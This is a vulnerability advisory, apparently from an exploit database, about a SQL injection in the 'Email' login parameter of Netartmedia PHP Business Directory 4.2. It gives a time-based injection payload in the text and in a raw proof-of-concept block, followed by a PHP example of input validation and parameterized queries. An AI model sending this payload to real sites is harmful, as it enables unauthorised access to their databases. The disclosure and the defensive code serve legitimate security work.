Vendor: PHP Business Directory
By: Ahmet Ümit BAYRAM
CVSS: 7.5 (HIGH)
Type: SQL Injection
CWE: 89
Product Name: PHP Business Directory
Affected Version From: 4.2
Affected Version To: 4.2
Patch Exists: NO
Related CWE: N/A
CPE: a:netartmedia:php_business_directory:4.2
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Kali Linux
Year: 2019

Netartmedia PHP Business Directory 4.2 – SQL Injection

Netartmedia PHP Business Directory 4.2 is vulnerable to SQL injection through the 'Email' POST parameter of the 'loginaction.php' page. An attacker can exploit this vulnerability by sending a specially crafted payload in that parameter. The payload used in this exploit is 'Email=0'XOR(if(now()=sysdate()%2Csleep(0)%2C0))XOR'Z&Password=g00dPa%24%24w0rD&lang=en&mod=login', which will cause the application to sleep for 0 seconds if the current date is equal to the system date.

Mitigation:

Developers should ensure that user input is properly sanitized and validated before being used in SQL queries.
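
The mitigation above, as an added PHP example (not Netartmedia's code): the Email value is validated and then bound as a query parameter instead of being concatenated into the SQL text. The users table, its columns and find_user() are assumptions, and the in-memory SQLite data is constructed so the script runs offline.

```php
<?php
// Added example: hypothetical login lookup, not the vendor's loginaction.php.
// Table and column names (users, email, password_hash) are assumptions.

function find_user(PDO $db, string $email, string $password): ?array
{
    // Validate shape first: reject anything that is not a plausible address.
    if (strlen($email) > 254 || filter_var($email, FILTER_VALIDATE_EMAIL) === false) {
        return null;
    }
    // Bound parameter: the value travels as data and is never parsed as SQL.
    $stmt = $db->prepare(
        'SELECT id, email, password_hash FROM users WHERE email = :email'
    );
    $stmt->execute([':email' => $email]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    // Same null result for "no such user" and "wrong password".
    if ($row === false || !password_verify($password, $row['password_hash'])) {
        return null;
    }
    return ['id' => (int) $row['id'], 'email' => $row['email']];
}

// Constructed demo data in an in-memory SQLite database.
// With the MySQL driver, also set PDO::ATTR_EMULATE_PREPARES to false.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (
    id INTEGER PRIMARY KEY, email TEXT UNIQUE, password_hash TEXT)');
$ins = $db->prepare('INSERT INTO users (email, password_hash) VALUES (?, ?)');
$ins->execute(['alice@example.test', password_hash('correct horse', PASSWORD_DEFAULT)]);

// Email value from the PoC on this page, URL-decoded as it would arrive in $_POST.
$poc = "0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z";

// A legitimate login against the constructed row.
var_dump(find_user($db, 'alice@example.test', 'correct horse') !== null);

// The PoC value through the validated, parameterized path.
var_dump(find_user($db, $poc, 'g00dPa$$w0rD'));

// Binding alone, without the format check: the value is compared as one
// literal string, so the quote and XOR(...) are not interpreted as SQL.
$stmt = $db->prepare('SELECT COUNT(*) FROM users WHERE email = ?');
$stmt->execute([$poc]);
var_dump((int) $stmt->fetchColumn());
```
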

Exploit-DB raw data:

# Exploit Title: Netartmedia PHP Business Directory 4.2 - SQL Injection
# Date: 19.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://www.phpbusinessdirectory.com/
# Demo Site: https://www.bizwebdirectory.com/
# Version: 4.2
# Tested on: Kali Linux
# CVE: N/A
 ----- PoC SQLi -----

Request: http://localhost/[PATH]/USERS/loginaction.php
Parameter: Email (POST)
Payload: Email=0'XOR(if(now()=sysdate()%2Csleep(0)%2C0))XOR'Z&Password=g00dPa%24%24w0rD&lang=en&mod=login